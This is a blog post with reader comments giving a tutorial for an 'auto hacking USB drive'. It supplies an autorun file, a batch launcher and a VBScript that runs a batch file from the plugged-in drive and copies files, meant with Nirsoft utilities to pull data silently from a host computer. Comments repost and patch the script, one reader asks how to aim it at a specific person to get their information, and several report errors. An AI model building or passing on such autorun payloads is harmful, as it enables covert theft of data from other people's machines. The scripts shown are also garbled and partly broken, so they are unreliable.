How To Make An Auto Hacking USB Drive
This video will show you how to make an auto-hacking USB drive and how to protect yourself from them.
U3 Universal customizer- http://www.u3community.com/vie…..¦php?t=434
Batch to exe converter – http://download.cnet.com/Bat-T…..55897.html
Nirsoft Utilities – http://www.nirsoft.net
Â
AUTORUN SCRIPT:
[Autorun]
open=launch.exe -a
LAUNCH.BAT SCRIPT:
usb.vbs
USB.VBS SCRIPT:
Dim oFSO, oDrive, objFolder, oDestination, shell
Const USBDRIVE=1
oDestination = “c:test”
set oFSO = Wscript.CreateObject(“Scripting.FileSystemObject”)
Set shell=createobject(“wscript.shell”)
For Each oDrive in oFSO.DrivesIf oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> “A” Then
shell.run oDrive.DriveLetter & “:batch.bat”
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo “Copying File”,Files
newDst=oDst&”"&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
End Sub
Â
Join the forum discussion on this post
36 Responses to “How To Make An Auto Hacking USB Drive”
Use the Form Below to Leave a Reply




No video?
Do you have to to do the “.bat to .exe” step. As far as I know, they’re treated the same in Windows.
Regardless, very nice hack for the U3 software. I never liked U3 very much, now I can replace it with PortableApps instead.
thank you very much this tutorial was very heplful regarding security reasons . Keep up the good work !
Could this same usb hack be used for stopping applications?
The link to the universal customizer doesn’t work.
Hey Tinkernut. Great job. Your videos are fantastic. I recently had a technician come and check my internet connection because it’s been running real slow. Videos take a long time to play and basically I have to pause your videos and let them load, so I can view them. The tech said there was nothing wrong with my internet speed and that it was fine. Is there a true way to check this? I run a command to ping yahoo, google and my ip, but it show no loss of data. The provider promises 7mbps and when I run 2wire speed test or speedtest.net, I a range between 1.5 to less than 3 mbps. Any response will help. Thanks a lot for your help.
thanks for this tutorial
and
happy birthday
Well I’ll say it, I’m confused. Is this an instance where he’s saying more than he is saying? This guy is a genius for showing us regulars how to “pretend” like we’re as smart as he is. I’m thinking that this is the reason for a straight hack of any computer? Please let a dumbshit know what is going on here. I’m hoping and thinking that comments seem to be avoid of censure.
u r a genius!im 7 and i created my own website from scratch!
dude u r my hero! but i didnt understand this!
Your website is down
Universal customizer 1.0.0.8 is not working if you have this software please upload it & give us the link…
what softwere did you use to make this video,pls give me a download link
The link to the universal customizer doesn’t work.
hi tinkernut..this video is very factual which gives much more inf abt the usb hacks nice work dudes….
this doesnot work on other disk then scandisk drive. it is far more better if it is also applicable for other disk toooo
I prefer to Switchblade.
the code isnt in the forum???
I haven’t tried it, but I think the U3 launchpad can be downloaded and put on any flash drive. Great video keep em coming.
here is the Script
Dim oFSO, oDrive,objFolder,oDestination, shell
Const USBDRIVE=1
oDestination = “c:\test”
Set oFSO = WScript.CreateObject(“Scripting.FileSystemObject”)
Set shell=createobject(“wscript.shell”)
‘Get USB drive letter
For Each oDrive In oFSO.Drives
If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter “A” Then
shell.run oDrive.DriveLetter & “:\batch.bat”
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo “Copying File”,Files
newDst=oDst&”\”&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
End Sub
it could be that i made a mistake
u saw only programming a hack, but i like to see how it hacking
at first, thx so much for the everything,
i got vbscript 800a0408 error for making auto hacking USB. i copied the codes from your website and directly pasted in my file. but i dunno why the error keeps coming out. i tried many times, but anything changed.
i got error for usb.vbs file
line: 3
char: 16
error: invalid character
code: 800a0408
can you pls help me out for this? its really appreciated
thanks so much
just delete and replace all the double quotes in the script.
Also
If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter “A” Then
should be
If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter = “A” Then
guys, i got a problem.. is this only xp?
on my vista after i did it no my xp, i get a .cfg file not a html file… then i cant read data… please post reply
[...] USB Drive Filed Under: Uncategorized by tamtamzify — Leave a comment March 15, 2010 Tinkernut.com � Blog Archive � How To Make An Auto Hacking USB Drive. Comments RSS [...]
well i had the same error as yuki but i dont get what you mean…..example?
thanx for this video, its very helpful!!!!!!!!
Thanks for the video, i like it very much and it also is very helpful…. THANKS..
Good job team…I lik u guyz 4 u r GOOD,NAUGTY work.. keep it up.
My computer can’t change a .txt file to a .bat or .inf. Can someone help me?!!
I would like to know how to send a specific person that ‘hack’ and have the ‘hack’ send me back their information.
Thanks for considering the idea.
what is the website url for the website at 2:36 mins.
plz do more for hacking!
hey guys I need help here. I there’s an error on usb.vbs. how can i make it work. I probably have wrong script typed. Pls help
hi i had the same error on line 3 but i have fixed all the problems up untill i got this error
Line : 9
Character : 32
Error : syntax error
Code : 800A03EA
By the Way Line 3 and character 32 is:
shell.run oDrive.DriveLetter & :batch.bat
^
and i dont know what to do i have tried a few things but it would be great if you guys could help me thanks alot guys
[...] ?????, ???? ????? ??? ?? ?-DOK ???? ????? ???? ???????? (???? ?????? ???? ?"? ???? ????? ??? ??? ?? ??? ?? ????). [...]
how about making a ready made program so we can copy it directly from this site? thanks and more power